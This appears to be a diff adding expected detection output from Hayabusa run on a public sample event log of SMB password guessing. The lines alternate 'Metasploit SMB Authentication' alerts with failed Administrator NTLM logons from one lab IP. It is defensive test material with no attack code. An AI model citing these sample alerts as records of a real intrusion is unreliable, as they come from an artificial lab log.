+2016-09-20 01:50:31.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: A4TSN93DrSWb1ah4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.718 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QwFyrxiceLRTD9rI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.718 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.762 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ARbqo84Mr5T3ltRg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.762 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 34HpQJO17IDWber9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.901 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.978 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bSSbqOtdSeH58oIp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.978 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EMvTo7fU6J468WE9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.009 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8gzx6Vr9LoInM1df  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.051 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kwXC2S4HwdwNE6SX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1pQa1WxSt3bj9LEv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.136 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fm65jq9tRQznmWPh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.185 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zd8BJbXvEoaDADLc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.237 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: P0JlFw7S6jFUt4Iy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.280 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.313 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rfMbFXQcP5sA2wmf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.313 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.349 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Xu4pgyCcDjl9h0Et  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.349 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: B00w8dZG3sT2Lsqo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.396 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.450 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8aKGq6qrchp4SLvT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.450 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.568 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XnScYHBCKOSHItsi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.568 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: r8UMBM326M7a4njd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.610 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kTdYWOi6p7etRfya  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.691 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JWSlcEVzj5lGtVg0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.691 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Xc77wukLTPOYAzj2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.728 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.769 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: w4WmTwTGuwDN6YXn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.769 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aeN4cSffFA04oOje  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.817 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.849 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eYFPV1kGALqX8jyO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.849 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qIlhxT4qqo5bCsU3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: btoOskH0112h7MTO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.928 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nWUhQJBcS7XbMJUq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.972 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: E70qmXDDWqmWJjyU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.004 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oX0L8wf6nt2grLvn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.047 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0D8BwniiXsjfkYqE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.081 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sSWYo4mphuvKHQHl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.124 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: im8an1mDle9f8skd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aOyLWd5CAAjnJt3C  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.200 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.240 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: s7gI55uWlshCLw3y  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.240 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: l7UogJ8bBw6Epbht  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qIl0QRFHXCVAHWdV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.328 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.370 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OxPv9v4TxFvS9JMy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.370 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uHMGfCorrLXpDyeD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.417 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KQTKgFibIa8NWExO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.452 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.492 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rEnx3upH3Om0wHn7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.492 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KlNbW1ljPSTdgUKY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.532 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: w2WMd3HugfjSwJPJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.582 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yEy0C6dMhysbNDrX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.628 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vxlayd8pnAZ3dZ2Q  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.666 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PhKO1jyWqVEdC9w2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.701 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
